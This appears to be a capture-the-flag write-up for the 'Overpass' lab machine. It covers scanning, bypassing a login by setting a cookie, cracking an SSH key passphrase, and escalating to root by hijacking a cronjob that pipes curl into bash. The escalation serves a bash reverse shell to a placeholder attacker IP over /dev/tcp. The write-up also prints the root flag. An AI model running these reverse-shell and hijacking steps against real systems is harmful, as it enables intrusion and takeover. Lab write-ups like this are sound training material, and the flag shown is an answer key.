Target Details

  • IP:

Nmap Scan

  • Scan

    nmap -sV -sC -Pn -oN scan.txt
  • Output

    # Nmap 7.92 scan initiated Wed Jun 29 11:11:57 2022 as: nmap -sV -sC -Pn -oN scan.txt
    Nmap scan report for
    Host is up (0.42s latency).
    Not shown: 998 closed tcp ports (conn-refused)
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
    |   256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
    |_  256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
    80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
    |_http-title: Overpass
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    Service detection performed. Please report any incorrect results at .
    # Nmap done at Wed Jun 29 11:13:04 2022 -- 1 IP address (1 host up) scanned in 66.68 seconds

    SSH and HTTP services are open

Find Directories using GoBuster

  • scan for directories

    gobuster dir -u "" -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --no-error -o web-dirs.txt

    useful link: /admin

Admin Page

  • visit Admin Page
  • View Source
  • Interesting finding was /login.js file, which consists of login logic for client side
  • Javascript Function for client side login

    async function login() {
      const usernameBox = document.querySelector("#username");
      const passwordBox = document.querySelector("#password");
      const loginStatus = document.querySelector("#loginStatus");
      loginStatus.textContent = "";
      const creds = { username: usernameBox.value, password: passwordBox.value };
      const response = await postData("/api/login", creds);
      const statusOrCookie = await response.text();
      if (statusOrCookie === "Incorrect credentials") {
        loginStatus.textContent = "Incorrect Credentials";
        passwordBox.value = "";
      } else {
        Cookies.set("SessionToken", statusOrCookie);
        window.location = "/admin";

    From the above piece of code, we can observe that, we can bypass login by setting a cookie from web-browser console (Ctrl+Shift+I -> console tab) and using below method then reload the page

  • On reloading, we’ll get private ssh key id_rsa on the page

    Since you keep forgetting your password, James, I've set up SSH keys for you.
    If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you.
    Also, we really need to talk about this "Military Grade" encryption. - Paradox
    Proc-Type: 4,ENCRYPTED
    DEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337
    -----END RSA PRIVATE KEY-----
  • save the ssh key to a file id_rsa

  • provide read and write access to user only

    chmod 600 ./id_rsa

Cracking id_rsa using John The Ripper

  • Copy script to current directory

    cp /usr/share/john/ .
  • Using the scipt convert into crackable hash for john

    python id_rsa | tee ssh-hash.txt
  • Crack using john the ripper

    john ssh-hash.txt

    Cracked password: james13

Accessing Target Machine via SSH

  • Since, the message was for james, assuming the username to be james, try logging in with the id_rsa file

    ssh -i ./id_rsa [email protected]

    password: james13

  • We’ll get access to the shell

    Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-108-generic x86_64)
     * Documentation:
     * Management:
     * Support:
      System information as of Wed Jun 29 06:39:02 UTC 2022
      System load:  0.23               Processes:           88
      Usage of /:   22.3% of 18.57GB   Users logged in:     0
      Memory usage: 16%                IP address for eth0:
      Swap usage:   0%
     * Canonical Livepatch is available for installation.
       - Reduce system reboots and improve kernel security. Activate at:
    47 packages can be updated.
    0 updates are security updates.
    Last login: Sat Jun 27 04:45:40 2020 from
    [email protected]:~$
  • On listing directory contents, we’ll find the first user.txt flag in james’s home directory

Privilege Escalation

  • There’s another file todo.txt, read file contents

    To Do:
    > Update Overpass' Encryption, Muirland has been complaining that it's not strong enough
    > Write down my password somewhere on a sticky note so that I don't forget it.
      Wait, we make a password manager. Why don't I just use that?
    > Test Overpass for macOS, it builds fine but I'm not sure it actually works
    > Ask Paradox how he got the automated build script working and where the builds go.
      They're not updating on the website

    james has stored password in their password manager

  • Download and Read source code of the Overpass Project from the target’s HTTP server

  • We can make below observations:

    • data is encrypted in ROT47 format in a file
    • data file is located in home directory named .overpass
  • Reading contents of ~/.overpass

    cat ~/.overpass
  • We can crack this encryption using online tools CyberChef

  • Unencrypted text

  • Download and Upload Linpeas to Target machine

    • Attacker Machine

      # Download Linpeas
      # get tryhackme ip using ifconfig
      # your tunnel can be different
      ifconfig tun0
      inet [ATTACKER-THM-IP] # this is attacker's tryhackme ip
      # Start HTTP server on Attacker's machine and download it on the target machine where linpeas is stored
      python3 -m http.server
    • Target Machine

      # download from attacker's machine
      wget http://[ATTACKER-THM-IP]:8000/
      # execute linpeas
      bash linpeas
  • Linpeas juicy findings

    # cronjob
    * * * * * root curl overpass.thm/downloads/src/ | bash
    # host file is writable

    it’s a cronjob which will run

  • Generating attack surface

    • Change overpass.thm ip to attacker’s ip
    • Create an evil bash script with path downloads/src/ which will be executed every minute
    • Start HTTP server using python on attacker’s machine to serve the file on port 80
    • Get root priviliges
  • Executing Attack

    • Target Machine

      # edit overpass.thm ip to attacker's ip
      nano /etc/hosts
    • Attacker’s Machine

      # simulate download directory
      mkdir -p ./www/downloads/src/
      # start a new terminal with listener on port 9999
      nc -nlvp 9999
      # create reverse shell script
      echo "bash -c 'exec bash -i &>/dev/tcp/[ATTACKER_THM_IP]/9999 <&1'" > ./www/downloads/src/
      # when the cronjob will run again, we'll get a reverse shell
      # start the server
      cd www
      sudo python3 -m http.server 80
      > This might take time
    • After running the job, we’ll get reverse shell

      [email protected]:~#
  • Get Root Flag

    cat /root/root.txt

    Output: thm{7f336f8c359dbac18d54fdd64ea753bb}


  • Q. Hack the machine and get the flag in user.txt

  • Q. Escalate your privileges and get the flag in root.txt